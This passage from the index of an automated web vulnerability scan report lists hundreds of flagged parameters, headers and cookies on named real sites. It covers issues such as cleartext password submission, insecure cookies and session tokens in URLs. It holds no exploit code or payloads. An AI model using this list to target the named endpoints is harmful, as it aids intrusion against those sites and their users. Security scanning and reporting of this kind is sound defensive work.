5.794. http://www.quantcast.com/top-sites/SK [REST URL parameter 2]

5.795. http://www.quantcast.com/top-sites/SL [REST URL parameter 1]

5.796. http://www.quantcast.com/top-sites/SL [REST URL parameter 2]

5.797. http://www.quantcast.com/top-sites/SM [REST URL parameter 1]

5.798. http://www.quantcast.com/top-sites/SM [REST URL parameter 2]

5.799. http://www.quantcast.com/top-sites/SN [REST URL parameter 1]

5.800. http://www.quantcast.com/top-sites/SN [REST URL parameter 2]

5.801. http://www.quantcast.com/top-sites/SO [REST URL parameter 1]

5.802. http://www.quantcast.com/top-sites/SO [REST URL parameter 2]

5.803. http://www.quantcast.com/top-sites/SR [REST URL parameter 1]

5.804. http://www.quantcast.com/top-sites/SR [REST URL parameter 2]

5.805. http://www.quantcast.com/top-sites/ST [REST URL parameter 1]

5.806. http://www.quantcast.com/top-sites/ST [REST URL parameter 2]

5.807. http://www.quantcast.com/top-sites/SV [REST URL parameter 1]

5.808. http://www.quantcast.com/top-sites/SV [REST URL parameter 2]

5.809. http://www.quantcast.com/top-sites/SY [REST URL parameter 1]

5.810. http://www.quantcast.com/top-sites/SY [REST URL parameter 2]

5.811. http://www.quantcast.com/top-sites/SZ [REST URL parameter 1]

5.812. http://www.quantcast.com/top-sites/SZ [REST URL parameter 2]

5.813. http://www.quantcast.com/top-sites/TC [REST URL parameter 1]

5.814. http://www.quantcast.com/top-sites/TC [REST URL parameter 2]

5.815. http://www.quantcast.com/top-sites/TD [REST URL parameter 1]

5.816. http://www.quantcast.com/top-sites/TD [REST URL parameter 2]

5.817. http://www.quantcast.com/top-sites/TF [REST URL parameter 1]

5.818. http://www.quantcast.com/top-sites/TF [REST URL parameter 2]

5.819. http://www.quantcast.com/top-sites/TG [REST URL parameter 1]

5.820. http://www.quantcast.com/top-sites/TG [REST URL parameter 2]

5.821. http://www.quantcast.com/top-sites/TH [REST URL parameter 1]

5.822. http://www.quantcast.com/top-sites/TH [REST URL parameter 2]

5.823. http://www.quantcast.com/top-sites/TJ [REST URL parameter 1]

5.824. http://www.quantcast.com/top-sites/TJ [REST URL parameter 2]

5.825. http://www.quantcast.com/top-sites/TK [REST URL parameter 1]

5.826. http://www.quantcast.com/top-sites/TK [REST URL parameter 2]

5.827. http://www.quantcast.com/top-sites/TL [REST URL parameter 1]

5.828. http://www.quantcast.com/top-sites/TL [REST URL parameter 2]

5.829. http://www.quantcast.com/top-sites/TM [REST URL parameter 1]

5.830. http://www.quantcast.com/top-sites/TM [REST URL parameter 2]

5.831. http://www.quantcast.com/top-sites/TN [REST URL parameter 1]

5.832. http://www.quantcast.com/top-sites/TN [REST URL parameter 2]

5.833. http://www.quantcast.com/top-sites/TO [REST URL parameter 1]

5.834. http://www.quantcast.com/top-sites/TO [REST URL parameter 2]

5.835. http://www.quantcast.com/top-sites/TR [REST URL parameter 1]

5.836. http://www.quantcast.com/top-sites/TR [REST URL parameter 2]

5.837. http://www.quantcast.com/top-sites/TT [REST URL parameter 1]

5.838. http://www.quantcast.com/top-sites/TT [REST URL parameter 2]

5.839. http://www.quantcast.com/top-sites/TV [REST URL parameter 1]

5.840. http://www.quantcast.com/top-sites/TV [REST URL parameter 2]

5.841. http://www.quantcast.com/top-sites/TW [REST URL parameter 1]

5.842. http://www.quantcast.com/top-sites/TW [REST URL parameter 2]

5.843. http://www.quantcast.com/top-sites/TZ [REST URL parameter 1]

5.844. http://www.quantcast.com/top-sites/TZ [REST URL parameter 2]

5.845. http://www.quantcast.com/top-sites/UA [REST URL parameter 1]

5.846. http://www.quantcast.com/top-sites/UA [REST URL parameter 2]

5.847. http://www.quantcast.com/top-sites/UG [REST URL parameter 1]

5.848. http://www.quantcast.com/top-sites/UG [REST URL parameter 2]

5.849. http://www.quantcast.com/top-sites/UM [REST URL parameter 1]

5.850. http://www.quantcast.com/top-sites/UM [REST URL parameter 2]

5.851. http://www.quantcast.com/top-sites/US [REST URL parameter 1]

5.852. http://www.quantcast.com/top-sites/US [REST URL parameter 2]

5.853. http://www.quantcast.com/top-sites/US/1 [REST URL parameter 1]

5.854. http://www.quantcast.com/top-sites/US/1 [REST URL parameter 2]

5.855. http://www.quantcast.com/top-sites/US/1 [REST URL parameter 3]

5.856. http://www.quantcast.com/top-sites/US/2 [REST URL parameter 1]

5.857. http://www.quantcast.com/top-sites/US/2 [REST URL parameter 2]

5.858. http://www.quantcast.com/top-sites/US/2 [REST URL parameter 3]

5.859. http://www.quantcast.com/top-sites/US/3 [REST URL parameter 1]

5.860. http://www.quantcast.com/top-sites/US/3 [REST URL parameter 2]

5.861. http://www.quantcast.com/top-sites/US/3 [REST URL parameter 3]

5.862. http://www.quantcast.com/top-sites/UY [REST URL parameter 1]

5.863. http://www.quantcast.com/top-sites/UY [REST URL parameter 2]

5.864. http://www.quantcast.com/top-sites/UZ [REST URL parameter 1]

5.865. http://www.quantcast.com/top-sites/UZ [REST URL parameter 2]

5.866. http://www.quantcast.com/top-sites/VA [REST URL parameter 1]

5.867. http://www.quantcast.com/top-sites/VA [REST URL parameter 2]

5.868. http://www.quantcast.com/top-sites/VC [REST URL parameter 1]

5.869. http://www.quantcast.com/top-sites/VC [REST URL parameter 2]

5.870. http://www.quantcast.com/top-sites/VE [REST URL parameter 1]

5.871. http://www.quantcast.com/top-sites/VE [REST URL parameter 2]

5.872. http://www.quantcast.com/top-sites/VG [REST URL parameter 1]

5.873. http://www.quantcast.com/top-sites/VG [REST URL parameter 2]

5.874. http://www.quantcast.com/top-sites/VI [REST URL parameter 1]

5.875. http://www.quantcast.com/top-sites/VI [REST URL parameter 2]

5.876. http://www.quantcast.com/top-sites/VN [REST URL parameter 1]

5.877. http://www.quantcast.com/top-sites/VN [REST URL parameter 2]

5.878. http://www.quantcast.com/top-sites/VU [REST URL parameter 1]

5.879. http://www.quantcast.com/top-sites/VU [REST URL parameter 2]

5.880. http://www.quantcast.com/top-sites/WF [REST URL parameter 1]

5.881. http://www.quantcast.com/top-sites/WF [REST URL parameter 2]

5.882. http://www.quantcast.com/top-sites/WS [REST URL parameter 1]

5.883. http://www.quantcast.com/top-sites/WS [REST URL parameter 2]

5.884. http://www.quantcast.com/top-sites/YE [REST URL parameter 1]

5.885. http://www.quantcast.com/top-sites/YE [REST URL parameter 2]

5.886. http://www.quantcast.com/top-sites/YT [REST URL parameter 1]

5.887. http://www.quantcast.com/top-sites/YT [REST URL parameter 2]

5.888. http://www.quantcast.com/top-sites/ZA [REST URL parameter 1]

5.889. http://www.quantcast.com/top-sites/ZA [REST URL parameter 2]

5.890. http://www.quantcast.com/top-sites/ZM [REST URL parameter 1]

5.891. http://www.quantcast.com/top-sites/ZM [REST URL parameter 2]

5.892. http://www.quantcast.com/top-sites/ZW [REST URL parameter 1]

5.893. http://www.quantcast.com/top-sites/ZW [REST URL parameter 2]

5.894. http://www.quantcast.com/topix.com [REST URL parameter 1]

5.895. http://www.quantcast.com/trafficrevenue.net [REST URL parameter 1]

5.896. http://www.quantcast.com/tripadvisor.com [REST URL parameter 1]

5.897. http://www.quantcast.com/tripod.com [REST URL parameter 1]

5.898. http://www.quantcast.com/tumblr.com [REST URL parameter 1]

5.899. http://www.quantcast.com/turbotax.com [REST URL parameter 1]

5.900. http://www.quantcast.com/twitter.com [REST URL parameter 1]

5.901. http://www.quantcast.com/typepad.com [REST URL parameter 1]

5.902. http://www.quantcast.com/user/favorites [REST URL parameter 1]

5.903. http://www.quantcast.com/user/favorites [REST URL parameter 2]

5.904. http://www.quantcast.com/user/login [REST URL parameter 1]

5.905. http://www.quantcast.com/user/login [REST URL parameter 2]

5.906. http://www.quantcast.com/user/signup [REST URL parameter 1]

5.907. http://www.quantcast.com/user/signup [REST URL parameter 2]

5.908. http://www.quantcast.com/usps.com [REST URL parameter 1]

5.909. http://www.quantcast.com/verizon.com [REST URL parameter 1]

5.910. http://www.quantcast.com/walmart.com [REST URL parameter 1]

5.911. http://www.quantcast.com/washingtonpost.com [REST URL parameter 1]

5.912. http://www.quantcast.com/weather.com [REST URL parameter 1]

5.913. http://www.quantcast.com/weather.gov [REST URL parameter 1]

5.914. http://www.quantcast.com/weatherbug.com [REST URL parameter 1]

5.915. http://www.quantcast.com/webmd.com [REST URL parameter 1]

5.916. http://www.quantcast.com/wellsfargo.com [REST URL parameter 1]

5.917. http://www.quantcast.com/whitepages.com [REST URL parameter 1]

5.918. http://www.quantcast.com/wikia.com [REST URL parameter 1]

5.919. http://www.quantcast.com/wikihow.com [REST URL parameter 1]

5.920. http://www.quantcast.com/wikipedia.org [REST URL parameter 1]

5.921. http://www.quantcast.com/wildtangent.com [REST URL parameter 1]

5.922. http://www.quantcast.com/wimp.com [REST URL parameter 1]

5.923. http://www.quantcast.com/windows.com [REST URL parameter 1]

5.924. http://www.quantcast.com/wordpress.com [REST URL parameter 1]

5.925. http://www.quantcast.com/wpapi/menus [REST URL parameter 1]

5.926. http://www.quantcast.com/wunderground.com [REST URL parameter 1]

5.927. http://www.quantcast.com/yahoo.com [REST URL parameter 1]

5.928. http://www.quantcast.com/yellowpages.com [REST URL parameter 1]

5.929. http://www.quantcast.com/yelp.com [REST URL parameter 1]

5.930. http://www.quantcast.com/youtube.com [REST URL parameter 1]

5.931. http://www.quantcast.com/zimbio.com [REST URL parameter 1]

5.932. http://www.quantcast.com/zynga.com [REST URL parameter 1]

5.933. http://www.reputation.com/services/ajax_updateShoppingCart.php [entityId parameter]

5.934. http://www.reputation.com/services/panelrenderer.php [entityId parameter]

5.935. http://www.southparkstudios.com/ [name of an arbitrarily supplied request parameter]

5.936. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 1]

5.937. http://www.southparkstudios.com//feeds/twitter_search/query/cart.mn/ [REST URL parameter 2]

5.938. http://www.southparkstudios.com/account/login [REST URL parameter 1]

5.939. http://www.southparkstudios.com/account/login [REST URL parameter 2]

5.940. http://www.southparkstudios.com/account/login [name of an arbitrarily supplied request parameter]

5.941. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 1]

5.942. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight [REST URL parameter 2]

5.943. http://www.southparkstudios.com/favicon.ico [REST URL parameter 1]

5.944. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 1]

5.945. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 2]

5.946. http://www.southparkstudios.com/feeds/poll-image/random [REST URL parameter 3]

5.947. http://www.southparkstudios.com/forum/ucp.php [REST URL parameter 1]

5.948. http://www.southparkstudios.com/gsp/shared/homepage/banners/quotes/0309-quote-moses-macaroni-pictures.swf [REST URL parameter 1]

5.949. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 1]

5.950. http://www.southparkstudios.com/guide/episodes/ [REST URL parameter 2]

5.951. http://www.southparkstudios.com/guide/episodes/ [name of an arbitrarily supplied request parameter]

5.952. http://www.southparkstudios.com/poll [REST URL parameter 1]

5.953. https://www.viglink.com/users/action/login [email parameter]

5.954. http://www.weather.gov/view/national.php [name of an arbitrarily supplied request parameter]

5.955. http://www.weather.gov/view/states.php [name of an arbitrarily supplied request parameter]

5.956. http://www.weather.gov/view/validProds.php [name of an arbitrarily supplied request parameter]

5.957. http://www.wrh.noaa.gov/sew/main.php [name of an arbitrarily supplied request parameter]

5.958. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [;pt parameter]

5.959. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

5.960. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [name of an arbitrarily supplied request parameter]

5.961. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [zone parameter]

5.962. http://www2.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

5.963. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

5.964. http://www25.glam.com/appdir/getscript.jsp [view parameter]

5.965. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

5.966. http://www35.glam.com/gad/glamadapt_jsrv.act [;pt parameter]

5.967. http://www35.glam.com/gad/glamadapt_jsrv.act [affiliateId parameter]

5.968. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

5.969. http://www35.glam.com/gad/glamadapt_jsrv.act [mName parameter]

5.970. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

5.971. http://www4.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

5.972. http://www5.jcpenney.com/jcp/X6E.aspx [CmCatId parameter]

5.973. http://www5.jcpenney.com/jcp/getjcpheaderc.aspx [function parameter]

5.974. http://xsltcache.alexa.com/traffic_graph/js/g/a/3m [REST URL parameter 5]

5.975. http://www.4shared.com/icons/16x16/ [Referer HTTP header]

5.976. http://www.addthis.com/bookmark.php [Referer HTTP header]

5.977. http://www.alexa.com/data/details/traffic_details [Referer HTTP header]

5.978. http://www.espnshop.com/ [Referer HTTP header]

5.979. http://www.espnshop.com/family/index.jsp [Referer HTTP header]

5.980. http://www.insideup.com/login.html [Referer HTTP header]

5.981. http://www.insideup.com/login.html [Referer HTTP header]

5.982. https://www.rei.com/ForgotPassword [Referer HTTP header]

5.983. https://www.rei.com/OrderTrackingLoginView [Referer HTTP header]

5.984. https://www.rei.com/RegistrationView [Referer HTTP header]

5.985. https://www.rei.com/YourAccountLoginView [Referer HTTP header]

5.986. https://www.reputation.com/products [abg_products/default6_d cookie]

5.987. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

5.988. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

5.989. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

5.990. http://www22.glam.com/glam_session.act [glam_sid cookie]

5.991. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

6. Flash cross-domain policy

6.1. http://www.awin1.com/crossdomain.xml

6.2. http://www.coach.com/crossdomain.xml

6.3. https://www.coach.com/crossdomain.xml

6.4. http://www.reedkrakoff.com/crossdomain.xml

6.5. http://www.vibrantmedia.com/crossdomain.xml

6.6. http://www12.glam.com/crossdomain.xml

6.7. http://yardbarker.tags.crwdcntrl.net/crossdomain.xml

6.8. http://www.southparkstudios.com/crossdomain.xml

6.9. http://www.zynga.com/crossdomain.xml

7. Cleartext submission of password

7.1. http://www.4shared.com/

7.2. http://www.4shared.com/enter.jsp

7.3. http://www.4shared.com/index.jsp

7.4. http://www.4shared.com/loginBox.jsp

7.5. http://www.4shared.com/signUpBox.jsp

7.6. http://www.admarvel.com/

7.7. http://www.bluefountainmedia.com/login

7.8. http://www.coach.com/online/handbags/OrderStatusView

7.9. http://www.digitalbond.com/2008/07/20/managing-your-security-career/

7.10. http://www.garage4hackers.com/showthread.php

7.11. http://www.insideup.com/login.html

7.12. http://www.komonews.com/younews

7.13. http://www.komonews.com/younews/116761799.html

7.14. http://www.komonews.com/younews/116762164.html

7.15. http://www.komonews.com/younews/116762524.html

7.16. http://www.komonews.com/younews/116762774.html

7.17. http://www.komonews.com/younews/116762809.html

7.18. http://www.lemonde.fr/economie/article/2011/04/13/soupcons-d-espionnage-chez-safran-sans-vol-de-donnees-a-caractere-industriel_1506757_3234.html

7.19. http://www.manta.com/member/register/

7.20. http://www.quantcast.com/

7.21. http://www.quantcast.com/global/personalHeader

7.22. http://www.quantcast.com/user/login

7.23. http://www.quantcast.com/user/signup

7.24. http://www.socialfollow.com/profiles/images/loadingAnimation.gif

7.25. http://www.sourceconference.com/blog/wp-login.php

7.26. http://www.southparkstudios.com/

7.27. http://www.southparkstudios.com/account/login

7.28. http://www.southparkstudios.com/clips/360434/god-bless-you-captain-hindsight

7.29. http://www.southparkstudios.com/guide/episodes/

7.30. http://www.tomcatexpert.com/blog/x26amp

7.31. http://www.tomcatexpert.com/blogs/mthomas/x26amp

8. SSL cookie without secure flag set

8.1. https://www.coach.com/online/handbags/PopUnderView

8.2. https://www.demandstudios.com/application.html

8.3. https://www.rei.com/CheckCart

8.4. https://www.rei.com/CreateNewAccount.do

8.5. https://www.rei.com/ForgotPassword

8.6. https://www.rei.com/Logoff

8.7. https://www.rei.com/OrderTrackingLoginView

8.8. https://www.rei.com/RegistrationView

8.9. https://www.rei.com/ShoppingCart

8.10. https://www.rei.com/WorkflowAction.do

8.11. https://www.rei.com/YourAccountLoginView

8.12. https://www.demandstudios.com/verify.aspx

8.13. https://www.digitalbond.com/wp-login.php

8.14. https://www.facebook.com/ESPNNewYork

8.15. https://www.mcafeesecure.com/RatingVerify

8.16. https://www.metropcs.com/assets/images/icon_vcpay.png

8.17. https://www.metropcs.com/assets/v3/images/footer/facebook.png

8.18. https://www.metropcs.com/assets/v3/images/footer/twitter.png

8.19. https://www.metropcs.com/assets/v3/images/footer/youtube.png

8.20. https://www.reputation.com/myprivacy

8.21. https://www.reputation.com/myprivacy-myreputation-bundle

8.22. https://www.reputation.com/products

8.23. https://www.reputation.com/reputationdefender

8.24. https://www.reputation.com/secure/reg1

8.25. https://www.sitefinity.com/login.aspx

8.26. https://www.telerik.com/login.aspx

9. Session token in URL

9.1. http://www.barracudacentral.org/

9.2. http://www.csoonline.com/article/679466/source-boston-2011-two-views-on-infosec-interviewing-hiring

9.3. http://www.executiveboard.com/

9.4. http://www.executiveboard.com/index.html

9.5. http://www.facebook.com/extern/login_status.php

9.6. http://www.garage4hackers.com/showthread.php

9.7. http://www.google.com/realtimejs

9.8. http://www.quantcast.com/about.com

9.9. http://www.quantcast.com/accuweather.com

9.10. http://www.quantcast.com/adobe.com

9.11. http://www.quantcast.com/amazon.com

9.12. http://www.quantcast.com/answers.com

9.13. http://www.quantcast.com/aol.com

9.14. http://www.quantcast.com/apple.com

9.15. http://www.quantcast.com/ask.com

9.16. http://www.quantcast.com/associatedcontent.com

9.17. http://www.quantcast.com/att.com

9.18. http://www.quantcast.com/bankofamerica.com

9.19. http://www.quantcast.com/bbc.co.uk

9.20. http://www.quantcast.com/bestbuy.com

9.21. http://www.quantcast.com/bing.com

9.22. http://www.quantcast.com/bizrate.com

9.23. http://www.quantcast.com/blogger.com

9.24. http://www.quantcast.com/blogspot.com

9.25. http://www.quantcast.com/break.com

9.26. http://www.quantcast.com/careerbuilder.com

9.27. http://www.quantcast.com/causes.com

9.28. http://www.quantcast.com/chacha.com

9.29. http://www.quantcast.com/chase.com

9.30. http://www.quantcast.com/city-data.com

9.31. http://www.quantcast.com/cnet.com

9.32. http://www.quantcast.com/cnn.com

9.33. http://www.quantcast.com/comcast.com

9.34. http://www.quantcast.com/comcast.net

9.35. http://www.quantcast.com/craigslist.org

9.36. http://www.quantcast.com/dailymotion.com

9.37. http://www.quantcast.com/drudgereport.com

9.38. http://www.quantcast.com/ebay.com

9.39. http://www.quantcast.com/ehow.com

9.40. http://www.quantcast.com/examiner.com

9.41. http://www.quantcast.com/facebook.com

9.42. http://www.quantcast.com/flickr.com

9.43. http://www.quantcast.com/foxnews.com

9.44. http://www.quantcast.com/go.com

9.45. http://www.quantcast.com/godaddy.com

9.46. http://www.quantcast.com/google.com

9.47. http://www.quantcast.com/hp.com

9.48. http://www.quantcast.com/hubpages.com

9.49. http://www.quantcast.com/huffingtonpost.com

9.50. http://www.quantcast.com/hulu.com

9.51. http://www.quantcast.com/imdb.com

9.52. http://www.quantcast.com/irs.gov

9.53. http://www.quantcast.com/jcpenney.com

9.54. http://www.quantcast.com/js/top-sites.js

9.55. http://www.quantcast.com/legacy.com

9.56. http://www.quantcast.com/linkedin.com

9.57. http://www.quantcast.com/live.com

9.58. http://www.quantcast.com/localpages.com

9.59. http://www.quantcast.com/manta.com

9.60. http://www.quantcast.com/mapquest.com

9.61. http://www.quantcast.com/match.com

9.62. http://www.quantcast.com/merriam-webster.com

9.63. http://www.quantcast.com/metacafe.com

9.64. http://www.quantcast.com/microsoft.com

9.65. http://www.quantcast.com/monster.com

9.66. http://www.quantcast.com/msn.com

9.67. http://www.quantcast.com/mtv.com

9.68. http://www.quantcast.com/myspace.com

9.69. http://www.quantcast.com/netflix.com

9.70. http://www.quantcast.com/norton.com

9.71. http://www.quantcast.com/nytimes.com

9.72. http://www.quantcast.com/overstock.com

9.73. http://www.quantcast.com/pandora.com

9.74. http://www.quantcast.com/paypal.com

9.75. http://www.quantcast.com/people.com

9.76. http://www.quantcast.com/photobucket.com

9.77. http://www.quantcast.com/quantcast-top-million.zip

9.78. http://www.quantcast.com/reddit.com

9.79. http://www.quantcast.com/reference.com

9.80. http://www.quantcast.com/searchassist.com

9.81. http://www.quantcast.com/simplyhired.com

9.82. http://www.quantcast.com/squidoo.com

9.83. http://www.quantcast.com/suite101.com

9.84. http://www.quantcast.com/target.com

9.85. http://www.quantcast.com/thefind.com

9.86. http://www.quantcast.com/time.com

9.87. http://www.quantcast.com/tmz.com

9.88. http://www.quantcast.com/top-sites-1

9.89. http://www.quantcast.com/top-sites/AD

9.90. http://www.quantcast.com/top-sites/AE

9.91. http://www.quantcast.com/top-sites/AF

9.92. http://www.quantcast.com/top-sites/AG

9.93. http://www.quantcast.com/top-sites/AI

9.94. http://www.quantcast.com/top-sites/AL

9.95. http://www.quantcast.com/top-sites/AM

9.96. http://www.quantcast.com/top-sites/AN

9.97. http://www.quantcast.com/top-sites/AO

9.98. http://www.quantcast.com/top-sites/AQ

9.99. http://www.quantcast.com/top-sites/AR

9.100. http://www.quantcast.com/top-sites/AS

9.101. http://www.quantcast.com/top-sites/AT

9.102. http://www.quantcast.com/top-sites/AU

9.103. http://www.quantcast.com/top-sites/AW

9.104. http://www.quantcast.com/top-sites/AX

9.105. http://www.quantcast.com/top-sites/AZ

9.106. http://www.quantcast.com/top-sites/BA

9.107. http://www.quantcast.com/top-sites/BB

9.108. http://www.quantcast.com/top-sites/BD

9.109. http://www.quantcast.com/top-sites/BE

9.110. http://www.quantcast.com/top-sites/BF

9.111. http://www.quantcast.com/top-sites/BG

9.112. http://www.quantcast.com/top-sites/BH

9.113. http://www.quantcast.com/top-sites/BI

9.114. http://www.quantcast.com/top-sites/BJ

9.115. http://www.quantcast.com/top-sites/BM

9.116. http://www.quantcast.com/top-sites/BN

9.117. http://www.quantcast.com/top-sites/BO

9.118. http://www.quantcast.com/top-sites/BR

9.119. http://www.quantcast.com/top-sites/BS

9.120. http://www.quantcast.com/top-sites/BT

9.121. http://www.quantcast.com/top-sites/BV

9.122. http://www.quantcast.com/top-sites/BW

9.123. http://www.quantcast.com/top-sites/BY

9.124. http://www.quantcast.com/top-sites/BZ

9.125. http://www.quantcast.com/top-sites/CA

9.126. http://www.quantcast.com/top-sites/CC

9.127. http://www.quantcast.com/top-sites/CD

9.128. http://www.quantcast.com/top-sites/CF

9.129. http://www.quantcast.com/top-sites/CG

9.130. http://www.quantcast.com/top-sites/CH

9.131. http://www.quantcast.com/top-sites/CI

9.132. http://www.quantcast.com/top-sites/CK

9.133. http://www.quantcast.com/top-sites/CL

9.134. http://www.quantcast.com/top-sites/CM

9.135. http://www.quantcast.com/top-sites/CN

9.136. http://www.quantcast.com/top-sites/CO

9.137. http://www.quantcast.com/top-sites/CR

9.138. http://www.quantcast.com/top-sites/CU

9.139. http://www.quantcast.com/top-sites/CV

9.140. http://www.quantcast.com/top-sites/CX

9.141. http://www.quantcast.com/top-sites/CY

9.142. http://www.quantcast.com/top-sites/CZ

9.143. http://www.quantcast.com/top-sites/DE

9.144. http://www.quantcast.com/top-sites/DJ

9.145. http://www.quantcast.com/top-sites/DK

9.146. http://www.quantcast.com/top-sites/DM

9.147. http://www.quantcast.com/top-sites/DO

9.148. http://www.quantcast.com/top-sites/DZ

9.149. http://www.quantcast.com/top-sites/EC

9.150. http://www.quantcast.com/top-sites/EE

9.151. http://www.quantcast.com/top-sites/EG

9.152. http://www.quantcast.com/top-sites/EH

9.153. http://www.quantcast.com/top-sites/ER

9.154. http://www.quantcast.com/top-sites/ES

9.155. http://www.quantcast.com/top-sites/ET

9.156. http://www.quantcast.com/top-sites/FI

9.157. http://www.quantcast.com/top-sites/FJ

9.158. http://www.quantcast.com/top-sites/FK

9.159. http://www.quantcast.com/top-sites/FM

9.160. http://www.quantcast.com/top-sites/FO

9.161. http://www.quantcast.com/top-sites/FR

9.162. http://www.quantcast.com/top-sites/GA

9.163. http://www.quantcast.com/top-sites/GB

9.164. http://www.quantcast.com/top-sites/GD

9.165. http://www.quantcast.com/top-sites/GE

9.166. http://www.quantcast.com/top-sites/GF

9.167. http://www.quantcast.com/top-sites/GG

9.168. http://www.quantcast.com/top-sites/GH

9.169. http://www.quantcast.com/top-sites/GI

9.170. http://www.quantcast.com/top-sites/GL

9.171. http://www.quantcast.com/top-sites/GM

9.172. http://www.quantcast.com/top-sites/GN

9.173. http://www.quantcast.com/top-sites/GP

9.174. http://www.quantcast.com/top-sites/GQ

9.175. http://www.quantcast.com/top-sites/GR

9.176. http://www.quantcast.com/top-sites/GS

9.177. http://www.quantcast.com/top-sites/GT

9.178. http://www.quantcast.com/top-sites/GU

9.179. http://www.quantcast.com/top-sites/GW

9.180. http://www.quantcast.com/top-sites/GY

9.181. http://www.quantcast.com/top-sites/HK

9.182. http://www.quantcast.com/top-sites/HM

9.183. http://www.quantcast.com/top-sites/HN

9.184. http://www.quantcast.com/top-sites/HR

9.185. http://www.quantcast.com/top-sites/HT

9.186. http://www.quantcast.com/top-sites/HU

9.187. http://www.quantcast.com/top-sites/ID

9.188. http://www.quantcast.com/top-sites/IE

9.189. http://www.quantcast.com/top-sites/IL

9.190. http://www.quantcast.com/top-sites/IM

9.191. http://www.quantcast.com/top-sites/IN

9.192. http://www.quantcast.com/top-sites/IO

9.193. http://www.quantcast.com/top-sites/IQ

9.194. http://www.quantcast.com/top-sites/IR

9.195. http://www.quantcast.com/top-sites/IS

9.196. http://www.quantcast.com/top-sites/IT

9.197. http://www.quantcast.com/top-sites/JE

9.198. http://www.quantcast.com/top-sites/JM

9.199. http://www.quantcast.com/top-sites/JO

9.200. http://www.quantcast.com/top-sites/JP

9.201. http://www.quantcast.com/top-sites/KE

9.202. http://www.quantcast.com/top-sites/KG

9.203. http://www.quantcast.com/top-sites/KH

9.204. http://www.quantcast.com/top-sites/KI

9.205. http://www.quantcast.com/top-sites/KM

9.206. http://www.quantcast.com/top-sites/KN

9.207. http://www.quantcast.com/top-sites/KP

9.208. http://www.quantcast.com/top-sites/KR

9.209. http://www.quantcast.com/top-sites/KW

9.210. http://www.quantcast.com/top-sites/KY

9.211. http://www.quantcast.com/top-sites/KZ

9.212. http://www.quantcast.com/top-sites/LA

9.213. http://www.quantcast.com/top-sites/LB

9.214. http://www.quantcast.com/top-sites/LC

9.215. http://www.quantcast.com/top-sites/LI

9.216. http://www.quantcast.com/top-sites/LK

9.217. http://www.quantcast.com/top-sites/LR

9.218. http://www.quantcast.com/top-sites/LS

9.219. http://www.quantcast.com/top-sites/LT

9.220. http://www.quantcast.com/top-sites/LU

9.221. http://www.quantcast.com/top-sites/LV

9.222. http://www.quantcast.com/top-sites/LY

9.223. http://www.quantcast.com/top-sites/MA

9.224. http://www.quantcast.com/top-sites/MC

9.225. http://www.quantcast.com/top-sites/MD

9.226. http://www.quantcast.com/top-sites/ME

9.227. http://www.quantcast.com/top-sites/MG

9.228. http://www.quantcast.com/top-sites/MH

9.229. http://www.quantcast.com/top-sites/MK

9.230. http://www.quantcast.com/top-sites/ML

9.231. http://www.quantcast.com/top-sites/MM

9.232. http://www.quantcast.com/top-sites/MN

9.233. http://www.quantcast.com/top-sites/MO

9.234. http://www.quantcast.com/top-sites/MP

9.235. http://www.quantcast.com/top-sites/MQ

9.236. http://www.quantcast.com/top-sites/MR

9.237. http://www.quantcast.com/top-sites/MS

9.238. http://www.quantcast.com/top-sites/MT

9.239. http://www.quantcast.com/top-sites/MU

9.240. http://www.quantcast.com/top-sites/MV

9.241. http://www.quantcast.com/top-sites/MW

9.242. http://www.quantcast.com/top-sites/MX

9.243. http://www.quantcast.com/top-sites/MY

9.244. http://www.quantcast.com/top-sites/MZ

9.245. http://www.quantcast.com/top-sites/NA

9.246. http://www.quantcast.com/top-sites/NC

9.247. http://www.quantcast.com/top-sites/NE

9.248. http://www.quantcast.com/top-sites/NF

9.249. http://www.quantcast.com/top-sites/NG

9.250. http://www.quantcast.com/top-sites/NI

9.251. http://www.quantcast.com/top-sites/NL

9.252. http://www.quantcast.com/top-sites/NO

9.253. http://www.quantcast.com/top-sites/NP

9.254. http://www.quantcast.com/top-sites/NR

9.255. http://www.quantcast.com/top-sites/NU

9.256. http://www.quantcast.com/top-sites/NZ

9.257. http://www.quantcast.com/top-sites/OM

9.258. http://www.quantcast.com/top-sites/PA

9.259. http://www.quantcast.com/top-sites/PE

9.260. http://www.quantcast.com/top-sites/PF

9.261. http://www.quantcast.com/top-sites/PG

9.262. http://www.quantcast.com/top-sites/PH

9.263. http://www.quantcast.com/top-sites/PK

9.264. http://www.quantcast.com/top-sites/PL

9.265. http://www.quantcast.com/top-sites/PM

9.266. http://www.quantcast.com/top-sites/PN

9.267. http://www.quantcast.com/top-sites/PR

9.268. http://www.quantcast.com/top-sites/PS

9.269. http://www.quantcast.com/top-sites/PT

9.270. http://www.quantcast.com/top-sites/PW

9.271. http://www.quantcast.com/top-sites/PY

9.272. http://www.quantcast.com/top-sites/QA

9.273. http://www.quantcast.com/top-sites/RE

9.274. http://www.quantcast.com/top-sites/RO

9.275. http://www.quantcast.com/top-sites/RS

9.276. http://www.quantcast.com/top-sites/RU

9.277. http://www.quantcast.com/top-sites/RW

9.278. http://www.quantcast.com/top-sites/SA

9.279. http://www.quantcast.com/top-sites/SB

9.280. http://www.quantcast.com/top-sites/SC

9.281. http://www.quantcast.com/top-sites/SD

9.282. http://www.quantcast.com/top-sites/SE

9.283. http://www.quantcast.com/top-sites/SG

